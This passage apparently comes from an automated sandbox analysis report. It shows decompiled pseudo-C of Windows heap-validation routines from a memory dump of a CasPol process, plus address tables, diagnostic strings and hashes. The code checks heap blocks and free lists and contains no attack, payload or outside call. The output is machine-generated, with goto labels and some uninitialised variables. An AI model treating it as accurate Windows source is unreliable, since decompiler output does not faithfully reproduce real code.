                                                                						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                                						__eflags = _t340;
                                                                						_push(_t340);
                                                                						E0162B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                                						L117:
                                                                						__eflags =  *(_t414 + 0x4c);
                                                                						if( *(_t414 + 0x4c) != 0) {
                                                                							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                							__eflags =  *_t415;
                                                                						}
                                                                						goto L119;
                                                                					}
                                                                					_t225 =  *_t415 & 0x0000ffff;
                                                                					_t390 =  *(_t415 + 2);
                                                                					_t342 = _t225;
                                                                					_v8 = _t342;
                                                                					_v20 = _t342;
                                                                					_v28 = _t225 << 3;
                                                                					if((_t390 & 0x00000001) == 0) {
                                                                						__eflags =  *(_t414 + 0x40) & 0x00000040;
                                                                						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
                                                                						__eflags = _t344 & 0x00000001;
                                                                						if((_t344 & 0x00000001) == 0) {
                                                                							L66:
                                                                							_t345 = _a12;
                                                                							 *_a8 =  *_a8 + 1;
                                                                							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
                                                                							__eflags =  *_t345;
                                                                							L67:
                                                                							_t231 =  *(_t415 + 6);
                                                                							if(_t231 == 0) {
                                                                								_t346 = _t414;
                                                                							} else {
                                                                								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
                                                                							}
                                                                							if(_t346 != _t332) {
                                                                								_t232 =  *[fs:0x30];
                                                                								__eflags =  *(_t232 + 0xc);
                                                                								if( *(_t232 + 0xc) == 0) {
                                                                									_push("HEAP: ");
                                                                									E0162B150();
                                                                								} else {
                                                                									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                								}
                                                                								_push( *(_t415 + 6) & 0x000000ff);
                                                                								_push(_t415);
                                                                								_push("Heap block at %p has incorrect segment offset (%x)\n");
                                                                								goto L95;
                                                                							} else {
                                                                								if( *((char*)(_t415 + 7)) != 3) {
                                                                									__eflags =  *(_t414 + 0x4c);
                                                                									if( *(_t414 + 0x4c) != 0) {
                                                                										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                										__eflags =  *_t415;
                                                                									}
                                                                									_t415 = _t415 + _v28;
                                                                									__eflags = _t415;
                                                                									goto L86;
                                                                								}
                                                                								_t245 =  *(_t415 + 0x1c);
                                                                								if(_t245 == 0) {
                                                                									_t395 =  *_t415 & 0x0000ffff;
                                                                									_v6 = _t395 >> 8;
                                                                									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
                                                                									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                										__eflags =  *(_t414 + 0x4c);
                                                                										if( *(_t414 + 0x4c) != 0) {
                                                                											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
                                                                											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                											__eflags =  *_t415;
                                                                										}
                                                                										goto L107;
                                                                									}
                                                                									_t249 =  *[fs:0x30];
                                                                									__eflags =  *(_t249 + 0xc);
                                                                									if( *(_t249 + 0xc) == 0) {
                                                                										_push("HEAP: ");
                                                                										E0162B150();
                                                                									} else {
                                                                										E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                									}
                                                                									_push( *((intOrPtr*)(_t332 + 0x28)));
                                                                									_push(_t415);
                                                                									_push("Heap block at %p is not last block in segment (%p)\n");
                                                                									L95:
                                                                									E0162B150();
                                                                									goto L117;
                                                                								}
                                                                								_v12 = _v12 + 1;
                                                                								_v16 = _v16 + (_t245 >> 0xc);
                                                                								if( *(_t414 + 0x4c) != 0) {
                                                                									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                								}
                                                                								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
                                                                								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
                                                                									L82:
                                                                									_v8 = _v8 & 0x00000000;
                                                                									goto L86;
                                                                								} else {
                                                                									if( *(_t414 + 0x4c) != 0) {
                                                                										_t397 =  *(_t414 + 0x50) ^  *_t415;
                                                                										 *_t415 = _t397;
                                                                										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
                                                                										_t442 = _t397 >> 0x18 - _t367;
                                                                										if(_t397 >> 0x18 != _t367) {
                                                                											_push(_t367);
                                                                											E016DFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
                                                                										}
                                                                									}
                                                                									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
                                                                										_t259 =  *[fs:0x30];
                                                                										__eflags =  *(_t259 + 0xc);
                                                                										if( *(_t259 + 0xc) == 0) {
                                                                											_push("HEAP: ");
                                                                											E0162B150();
                                                                										} else {
                                                                											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                										}
                                                                										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
                                                                										_push(_t415);
                                                                										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
                                                                										goto L95;
                                                                									} else {
                                                                										if( *(_t414 + 0x4c) != 0) {
                                                                											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                                											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                										}
                                                                										goto L82;
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                						_t281 = _v28 + 0xfffffff0;
                                                                						_v24 = _t281;
                                                                						__eflags = _t390 & 0x00000002;
                                                                						if((_t390 & 0x00000002) != 0) {
                                                                							__eflags = _t281 - 4;
                                                                							if(_t281 > 4) {
                                                                								_t281 = _t281 - 4;
                                                                								__eflags = _t281;
                                                                								_v24 = _t281;
                                                                							}
                                                                						}
                                                                						__eflags = _t390 & 0x00000008;
                                                                						if((_t390 & 0x00000008) == 0) {
                                                                							_t102 = _t415 + 0x10; // -8
                                                                							_t283 = E0167D540(_t102, _t281, 0xfeeefeee);
                                                                							_v20 = _t283;
                                                                							__eflags = _t283 - _v24;
                                                                							if(_t283 != _v24) {
                                                                								_t284 =  *[fs:0x30];
                                                                								__eflags =  *(_t284 + 0xc);
                                                                								if( *(_t284 + 0xc) == 0) {
                                                                									_push("HEAP: ");
                                                                									E0162B150();
                                                                								} else {
                                                                									E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                								}
                                                                								_t288 = _v20 + 8 + _t415;
                                                                								__eflags = _t288;
                                                                								_push(_t288);
                                                                								_push(_t415);
                                                                								_push("Free Heap block %p modified at %p after it was freed\n");
                                                                								goto L95;
                                                                							}
                                                                							goto L66;
                                                                						} else {
                                                                							_t374 =  *(_t415 + 8);
                                                                							_t400 =  *((intOrPtr*)(_t415 + 0xc));
                                                                							_v24 = _t374;
                                                                							_v28 = _t400;
                                                                							_t294 =  *(_t374 + 4);
                                                                							__eflags =  *_t400 - _t294;
                                                                							if( *_t400 != _t294) {
                                                                								L64:
                                                                								_push(_t374);
                                                                								_push( *_t400);
                                                                								_t101 = _t415 + 8; // -16
                                                                								E016EA80D(_t414, 0xd, _t101, _t294);
                                                                								goto L86;
                                                                							}
                                                                							_t56 = _t415 + 8; // -16
                                                                							__eflags =  *_t400 - _t56;
                                                                							_t374 = _v24;
                                                                							if( *_t400 != _t56) {
                                                                								goto L64;
                                                                							}
                                                                							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
                                                                							_t402 =  *(_t414 + 0xb4);
                                                                							__eflags = _t402;
                                                                							if(_t402 == 0) {
                                                                								L35:
                                                                								_t298 = _v28;
                                                                								 *_t298 = _t374;
                                                                								 *(_t374 + 4) = _t298;
                                                                								__eflags =  *(_t415 + 2) & 0x00000008;
                                                                								if(( *(_t415 + 2) & 0x00000008) == 0) {
                                                                									L39:
                                                                									_t377 =  *_t415 & 0x0000ffff;
                                                                									_t299 = _t414 + 0xc0;
                                                                									_v28 =  *_t415 & 0x0000ffff;
                                                                									 *(_t415 + 2) = 0;
                                                                									 *((char*)(_t415 + 7)) = 0;
                                                                									__eflags =  *(_t414 + 0xb4);
                                                                									if( *(_t414 + 0xb4) == 0) {
                                                                										_t378 =  *_t299;
                                                                									} else {
                                                                										_t378 = E0164E12C(_t414, _t377);
                                                                										_t299 = _t414 + 0xc0;
                                                                									}
                                                                									__eflags = _t299 - _t378;
                                                                									if(_t299 == _t378) {
                                                                										L51:
                                                                										_t300 =  *((intOrPtr*)(_t378 + 4));
                                                                										__eflags =  *_t300 - _t378;
                                                                										if( *_t300 != _t378) {
                                                                											_push(_t378);
                                                                											_push( *_t300);
                                                                											__eflags = 0;
                                                                											E016EA80D(0, 0xd, _t378, 0);
                                                                										} else {
                                                                											_t87 = _t415 + 8; // -16
                                                                											_t406 = _t87;
                                                                											 *_t406 = _t378;
                                                                											 *((intOrPtr*)(_t406 + 4)) = _t300;
                                                                											 *_t300 = _t406;
                                                                											 *((intOrPtr*)(_t378 + 4)) = _t406;
                                                                										}
                                                                										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
                                                                										_t405 =  *(_t414 + 0xb4);
                                                                										__eflags = _t405;
                                                                										if(_t405 == 0) {
                                                                											L61:
                                                                											__eflags =  *(_t414 + 0x4c);
                                                                											if(__eflags != 0) {
                                                                												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
                                                                												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                                											}
                                                                											goto L86;
                                                                										} else {
                                                                											_t380 =  *_t415 & 0x0000ffff;
                                                                											while(1) {
                                                                												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
                                                                												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
                                                                													break;
                                                                												}
                                                                												_t307 =  *_t405;
                                                                												__eflags = _t307;
                                                                												if(_t307 == 0) {
                                                                													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
                                                                													L60:
                                                                													_t94 = _t415 + 8; // -16
                                                                													E0164E4A0(_t414, _t405, 1, _t94, _t309, _t380);
                                                                													goto L61;
                                                                												}
                                                                												_t405 = _t307;
                                                                											}
                                                                											_t309 = _t380;
                                                                											goto L60;
                                                                										}
                                                                									} else {
                                                                										_t407 =  *(_t414 + 0x4c);
                                                                										while(1) {
                                                                											__eflags = _t407;
                                                                											if(_t407 == 0) {
                                                                												_t312 =  *(_t378 - 8) & 0x0000ffff;
                                                                											} else {
                                                                												_t315 =  *(_t378 - 8);
                                                                												_t407 =  *(_t414 + 0x4c);
                                                                												__eflags = _t315 & _t407;
                                                                												if((_t315 & _t407) != 0) {
                                                                													_t315 = _t315 ^  *(_t414 + 0x50);
                                                                													__eflags = _t315;
                                                                												}
                                                                												_t312 = _t315 & 0x0000ffff;
                                                                											}
                                                                											__eflags = _v28 - (_t312 & 0x0000ffff);
                                                                											if(_v28 <= (_t312 & 0x0000ffff)) {
                                                                												goto L51;
                                                                											}
                                                                											_t378 =  *_t378;
                                                                											__eflags = _t414 + 0xc0 - _t378;
                                                                											if(_t414 + 0xc0 != _t378) {
                                                                												continue;
                                                                											}
                                                                											goto L51;
                                                                										}
                                                                										goto L51;
                                                                									}
                                                                								}
                                                                								_t317 = E0164A229(_t414, _t415);
                                                                								__eflags = _t317;
                                                                								if(_t317 != 0) {
                                                                									goto L39;
                                                                								}
                                                                								E0164A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
                                                                								goto L86;
                                                                							}
                                                                							_t385 =  *_t415 & 0x0000ffff;
                                                                							while(1) {
                                                                								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
                                                                								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
                                                                									break;
                                                                								}
                                                                								_t320 =  *_t402;
                                                                								__eflags = _t320;
                                                                								if(_t320 == 0) {
                                                                									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
                                                                									L34:
                                                                									_t63 = _t415 + 8; // -16
                                                                									E0164BC04(_t414, _t402, 1, _t63, _t322, _t385);
                                                                									_t374 = _v24;
                                                                									goto L35;
                                                                								}
                                                                								_t402 = _t320;
                                                                							}
                                                                							_t322 = _t385;
                                                                							goto L34;
                                                                						}
                                                                					}
                                                                					if(_a20 == 0) {
                                                                						L18:
                                                                						if(( *(_t415 + 2) & 0x00000004) == 0) {
                                                                							goto L67;
                                                                						}
                                                                						if(E016D23E3(_t414, _t415) == 0) {
                                                                							goto L117;
                                                                						}
                                                                						goto L67;
                                                                					} else {
                                                                						if((_t390 & 0x00000002) == 0) {
                                                                							_t326 =  *(_t415 + 3) & 0x000000ff;
                                                                						} else {
                                                                							_t328 = E01621F5B(_t415);
                                                                							_t342 = _v20;
                                                                							_t326 =  *(_t328 + 2) & 0x0000ffff;
                                                                						}
                                                                						_t429 = _t326;
                                                                						if(_t429 == 0) {
                                                                							goto L18;
                                                                						}
                                                                						if(_t429 >= 0) {
                                                                							__eflags = _t326 & 0x00000800;
                                                                							if(__eflags != 0) {
                                                                								goto L18;
                                                                							}
                                                                							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
                                                                							if(__eflags >= 0) {
                                                                								goto L18;
                                                                							}
                                                                							_t412 = _a20;
                                                                							_t327 = _t326 & 0x0000ffff;
                                                                							L17:
                                                                							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
                                                                							goto L18;
                                                                						}
                                                                						_t327 = _t326 & 0x00007fff;
                                                                						if(_t327 >= 0x81) {
                                                                							goto L18;
                                                                						}
                                                                						_t412 = _a24;
                                                                						goto L17;
                                                                					}
                                                                					L86:
                                                                				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
                                                                				_t189 = _v12;
                                                                				goto L88;
                                                                			}
                                                                0x016e4c17
                                                                0x016e4dae
                                                                0x016e4db2
                                                                0x016e4db7
                                                                0x016e4dba
                                                                0x016e4dbd
                                                                0x016e4ef1
                                                                0x016e4ef7
                                                                0x016e4efb
                                                                0x016e4f1a
                                                                0x016e4f1f
                                                                0x016e4efd
                                                                0x016e4f12
                                                                0x016e4f17
                                                                0x016e4f2b
                                                                0x016e4f2b
                                                                0x016e4f2d
                                                                0x016e4f2e
                                                                0x016e4f2f
                                                                0x00000000
                                                                0x016e4f2f
                                                                0x00000000
                                                                0x016e4c1d
                                                                0x016e4c1d
                                                                0x016e4c20
                                                                0x016e4c23
                                                                0x016e4c26
                                                                0x016e4c29
                                                                0x016e4c2c
                                                                0x016e4c2e
                                                                0x016e4d91
                                                                0x016e4d91
                                                                0x016e4d92
                                                                0x016e4d97
                                                                0x016e4d9e
                                                                0x00000000
                                                                0x016e4d9e
                                                                0x016e4c34
                                                                0x016e4c37
                                                                0x016e4c39
                                                                0x016e4c3c
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4c45
                                                                0x016e4c48
                                                                0x016e4c4e
                                                                0x016e4c50
                                                                0x016e4c78
                                                                0x016e4c78
                                                                0x016e4c7b
                                                                0x016e4c7d
                                                                0x016e4c80
                                                                0x016e4c84
                                                                0x016e4cad
                                                                0x016e4cad
                                                                0x016e4cb0
                                                                0x016e4cb8
                                                                0x016e4cbb
                                                                0x016e4cbe
                                                                0x016e4cc1
                                                                0x016e4cc7
                                                                0x016e4cdc
                                                                0x016e4cc9
                                                                0x016e4cd2
                                                                0x016e4cd4
                                                                0x016e4cd4
                                                                0x016e4cde
                                                                0x016e4ce0
                                                                0x016e4d13
                                                                0x016e4d13
                                                                0x016e4d16
                                                                0x016e4d18
                                                                0x016e4d29
                                                                0x016e4d2a
                                                                0x016e4d2c
                                                                0x016e4d34
                                                                0x016e4d1a
                                                                0x016e4d1a
                                                                0x016e4d1a
                                                                0x016e4d1d
                                                                0x016e4d1f
                                                                0x016e4d22
                                                                0x016e4d24
                                                                0x016e4d24
                                                                0x016e4d3c
                                                                0x016e4d3f
                                                                0x016e4d45
                                                                0x016e4d47
                                                                0x016e4d6c
                                                                0x016e4d6c
                                                                0x016e4d70
                                                                0x016e4d7e
                                                                0x016e4d84
                                                                0x016e4d84
                                                                0x00000000
                                                                0x016e4d49
                                                                0x016e4d49
                                                                0x016e4d56
                                                                0x016e4d56
                                                                0x016e4d59
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4d4e
                                                                0x016e4d50
                                                                0x016e4d52
                                                                0x016e4d8e
                                                                0x016e4d5d
                                                                0x016e4d5f
                                                                0x016e4d67
                                                                0x00000000
                                                                0x016e4d67
                                                                0x016e4d54
                                                                0x016e4d54
                                                                0x016e4d5b
                                                                0x00000000
                                                                0x016e4d5b
                                                                0x016e4ce2
                                                                0x016e4ce2
                                                                0x016e4ce5
                                                                0x016e4ce5
                                                                0x016e4ce7
                                                                0x016e4cfb
                                                                0x016e4ce9
                                                                0x016e4ce9
                                                                0x016e4cec
                                                                0x016e4cef
                                                                0x016e4cf1
                                                                0x016e4cf3
                                                                0x016e4cf3
                                                                0x016e4cf3
                                                                0x016e4cf6
                                                                0x016e4cf6
                                                                0x016e4d02
                                                                0x016e4d05
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4d07
                                                                0x016e4d0f
                                                                0x016e4d11
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4d11
                                                                0x00000000
                                                                0x016e4ce5
                                                                0x016e4ce0
                                                                0x016e4c8a
                                                                0x016e4c8f
                                                                0x016e4c91
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4c9d
                                                                0x00000000
                                                                0x016e4c9d
                                                                0x016e4c52
                                                                0x016e4c5f
                                                                0x016e4c5f
                                                                0x016e4c62
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4c57
                                                                0x016e4c59
                                                                0x016e4c5b
                                                                0x016e4caa
                                                                0x016e4c66
                                                                0x016e4c68
                                                                0x016e4c70
                                                                0x016e4c75
                                                                0x00000000
                                                                0x016e4c75
                                                                0x016e4c5d
                                                                0x016e4c5d
                                                                0x016e4c64
                                                                0x00000000
                                                                0x016e4c64
                                                                0x016e4c17
                                                                0x016e4b75
                                                                0x016e4bc4
                                                                0x016e4bc8
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4bd9
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4b77
                                                                0x016e4b7a
                                                                0x016e4b8c
                                                                0x016e4b7c
                                                                0x016e4b7e
                                                                0x016e4b83
                                                                0x016e4b86
                                                                0x016e4b86
                                                                0x016e4b90
                                                                0x016e4b93
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4b95
                                                                0x016e4bab
                                                                0x016e4bb0
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4bb2
                                                                0x016e4bb9
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4bbb
                                                                0x016e4bbe
                                                                0x016e4bc1
                                                                0x016e4bc1
                                                                0x00000000
                                                                0x016e4bc1
                                                                0x016e4b97
                                                                0x016e4ba4
                                                                0x00000000
                                                                0x00000000
                                                                0x016e4ba6
                                                                0x00000000
                                                                0x016e4ba6
                                                                0x016e4ea9
                                                                0x016e4ea9
                                                                0x016e4eb2
                                                                0x00000000

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                • API String ID: 0-3591852110
                                                                • Opcode ID: 31a3f926d8cd6bfc257ba056e5d62b6d2860366530ce0a7ff414bc6225f44d3d
                                                                • Instruction ID: 537974da34dc4c17f618d91f6ff19ceef10c7751849d4fe722114eb113b74efe
                                                                • Opcode Fuzzy Hash: 31a3f926d8cd6bfc257ba056e5d62b6d2860366530ce0a7ff414bc6225f44d3d
                                                                • Instruction Fuzzy Hash: E012BE306026429FDB25DF69C898BB6BBE2EF48614F14865DE486CB741DB35E881CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                C-Code - Quality: 56%
                                                                			E016E4496(signed int* __ecx, void* __edx) {
                                                                				signed int _v5;
                                                                				signed int _v12;
                                                                				signed int _v16;
                                                                				signed int _v20;
                                                                				signed char _v24;
                                                                				signed int* _v28;
                                                                				char _v32;
                                                                				signed int* _v36;
                                                                				void* __ebx;
                                                                				void* __edi;
                                                                				void* __esi;
                                                                				void* __ebp;
                                                                				void* _t150;
                                                                				intOrPtr _t151;
                                                                				signed char _t156;
                                                                				intOrPtr _t157;
                                                                				unsigned int _t169;
                                                                				intOrPtr _t170;
                                                                				signed int* _t183;
                                                                				signed char _t184;
                                                                				intOrPtr _t191;
                                                                				signed int _t201;
                                                                				intOrPtr _t203;
                                                                				intOrPtr _t212;
                                                                				intOrPtr _t220;
                                                                				signed int _t230;
                                                                				signed int _t241;
                                                                				signed int _t244;
                                                                				void* _t259;
                                                                				signed int _t260;
                                                                				signed int* _t261;
                                                                				intOrPtr* _t262;
                                                                				signed int _t263;
                                                                				signed int* _t264;
                                                                				signed int _t267;
                                                                				signed int* _t268;
                                                                				void* _t270;
                                                                				void* _t281;
                                                                				signed short _t285;
                                                                				signed short _t289;
                                                                				signed int _t291;
                                                                				signed int _t298;
                                                                				signed char _t303;
                                                                				signed char _t308;
                                                                				signed int _t314;
                                                                				intOrPtr _t317;
                                                                				unsigned int _t319;
                                                                				signed int* _t325;
                                                                				signed int _t326;
                                                                				signed int _t327;
                                                                				intOrPtr _t328;
                                                                				signed int _t329;
                                                                				signed int _t330;
                                                                				signed int* _t331;
                                                                				signed int _t332;
                                                                				signed int _t350;
                                                                
                                                                				_t259 = __edx;
                                                                				_t331 = __ecx;
                                                                				_v28 = __ecx;
                                                                				_v20 = 0;
                                                                				_v12 = 0;
                                                                				_t150 = E016E49A4(__ecx);
                                                                				_t267 = 1;
                                                                				if(_t150 == 0) {
                                                                					L61:
                                                                					_t151 =  *[fs:0x30];
                                                                					__eflags =  *((char*)(_t151 + 2));
                                                                					if( *((char*)(_t151 + 2)) != 0) {
                                                                						 *0x1716378 = _t267;
                                                                						asm("int3");
                                                                						 *0x1716378 = 0;
                                                                					}
                                                                					__eflags = _v12;
                                                                					if(_v12 != 0) {
                                                                						_t105 =  &_v16;
                                                                						 *_t105 = _v16 & 0x00000000;
                                                                						__eflags =  *_t105;
                                                                						E0165174B( &_v12,  &_v16, 0x8000);
                                                                					}
                                                                					L65:
                                                                					__eflags = 0;
                                                                					return 0;
                                                                				}
                                                                				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
                                                                					_t268 =  &(_t331[0x30]);
                                                                					_v32 = 0;
                                                                					_t260 =  *_t268;
                                                                					_t308 = 0;
                                                                					_v24 = 0;
                                                                					while(_t268 != _t260) {
                                                                						_t260 =  *_t260;
                                                                						_v16 =  *_t325 & 0x0000ffff;
                                                                						_t156 = _t325[0];
                                                                						_v28 = _t325;
                                                                						_v5 = _t156;
                                                                						__eflags = _t156 & 0x00000001;
                                                                						if((_t156 & 0x00000001) != 0) {
                                                                							_t157 =  *[fs:0x30];
                                                                							__eflags =  *(_t157 + 0xc);
                                                                							if( *(_t157 + 0xc) == 0) {
                                                                								_push("HEAP: ");
                                                                								E0162B150();
                                                                							} else {
                                                                								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                							}
                                                                							_push(_t325);
                                                                							E0162B150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
                                                                							L32:
                                                                							_t270 = 0;
                                                                							__eflags = _t331[0x13];
                                                                							if(_t331[0x13] != 0) {
                                                                								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
                                                                								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                							}
                                                                							L60:
                                                                							_t267 = _t270 + 1;
                                                                							__eflags = _t267;
                                                                							goto L61;
                                                                						}
                                                                						_t169 =  *_t325 & 0x0000ffff;
                                                                						__eflags = _t169 - _t308;
                                                                						if(_t169 < _t308) {
                                                                							_t170 =  *[fs:0x30];
                                                                							__eflags =  *(_t170 + 0xc);
                                                                							if( *(_t170 + 0xc) == 0) {
                                                                								_push("HEAP: ");
                                                                								E0162B150();
                                                                							} else {
                                                                								E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                							}
                                                                							E0162B150("Non-Dedicated free list element %p is out of order\n", _t325);
                                                                							goto L32;
                                                                						} else {
                                                                							__eflags = _t331[0x13];
                                                                							_t308 = _t169;
                                                                							_v24 = _t308;
                                                                							if(_t331[0x13] != 0) {
                                                                								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
                                                                								 *_t325 =  *_t325 ^ _t331[0x14];
                                                                								__eflags =  *_t325;
                                                                							}
                                                                							_t26 =  &_v32;
                                                                							 *_t26 = _v32 + 1;
                                                                							__eflags =  *_t26;
                                                                							continue;
                                                                						}
                                                                					}
                                                                					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
                                                                					if( *0x1716350 != 0 && _t331[0x2f] != 0) {
                                                                						_push(4);
                                                                						_push(0x1000);
                                                                						_push( &_v16);
                                                                						_push(0);
                                                                						_push( &_v12);
                                                                						_push(0xffffffff);
                                                                						if(E01669660() >= 0) {
                                                                							_v20 = _v12 + 0x204;
                                                                						}
                                                                					}
                                                                					_t183 =  &(_t331[0x27]);
                                                                					_t281 = 0x81;
                                                                					_t326 =  *_t183;
                                                                					if(_t183 == _t326) {
                                                                						L49:
                                                                						_t261 =  &(_t331[0x29]);
                                                                						_t184 = 0;
                                                                						_t327 =  *_t261;
                                                                						_t282 = 0;
                                                                						_v24 = 0;
                                                                						_v36 = 0;
                                                                						__eflags = _t327 - _t261;
                                                                						if(_t327 == _t261) {
                                                                							L53:
                                                                							_t328 = _v32;
                                                                							_v28 = _t331;
                                                                							__eflags = _t328 - _t184;
                                                                							if(_t328 == _t184) {
                                                                								__eflags = _t331[0x1d] - _t282;
                                                                								if(_t331[0x1d] == _t282) {
                                                                									__eflags = _v12;
                                                                									if(_v12 == 0) {
                                                                										L82:
                                                                										_t267 = 1;
                                                                										__eflags = 1;
                                                                										goto L83;
                                                                									}
                                                                									_t329 = _t331[0x2f];
                                                                									__eflags = _t329;
                                                                									if(_t329 == 0) {
                                                                										L77:
                                                                										_t330 = _t331[0x22];
                                                                										__eflags = _t330;
                                                                										if(_t330 == 0) {
                                                                											L81:
                                                                											_t129 =  &_v16;
                                                                											 *_t129 = _v16 & 0x00000000;
                                                                											__eflags =  *_t129;
                                                                											E0165174B( &_v12,  &_v16, 0x8000);
                                                                											goto L82;
                                                                										}
                                                                										_t314 = _t331[0x21] & 0x0000ffff;
                                                                										_t285 = 1;
                                                                										__eflags = 1 - _t314;
                                                                										if(1 >= _t314) {
                                                                											goto L81;
                                                                										} else {
                                                                											goto L79;
                                                                										}
                                                                										while(1) {
                                                                											L79:
                                                                											_t330 = _t330 + 0x40;
                                                                											_t332 = _t285 & 0x0000ffff;
                                                                											_t262 = _v20 + _t332 * 4;
                                                                											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
                                                                											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
                                                                												break;
                                                                											}
                                                                											_t285 = _t285 + 1;
                                                                											__eflags = _t285 - _t314;
                                                                											if(_t285 < _t314) {
                                                                												continue;
                                                                											}
                                                                											goto L81;
                                                                										}
                                                                										_t191 =  *[fs:0x30];
                                                                										__eflags =  *(_t191 + 0xc);
                                                                										if( *(_t191 + 0xc) == 0) {
                                                                											_push("HEAP: ");
                                                                											E0162B150();
                                                                										} else {
                                                                											E0162B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                										}
                                                                										_push(_t262);
                                                                										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
                                                                										_t148 = _t330 + 0x10; // 0x10
                                                                										_push( *((intOrPtr*)(_t330 + 8)));
                                                                										E0162B150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
                                                                										L59:
                                                                										_t270 = 0;
                                                                										__eflags = 0;
                                                                										goto L60;
                                                                									}
                                                                									_t289 = 1;
                                                                									__eflags = 1;
                                                                									while(1) {
                                                                										_t201 = _v12;
                                                                										_t329 = _t329 + 0xc;
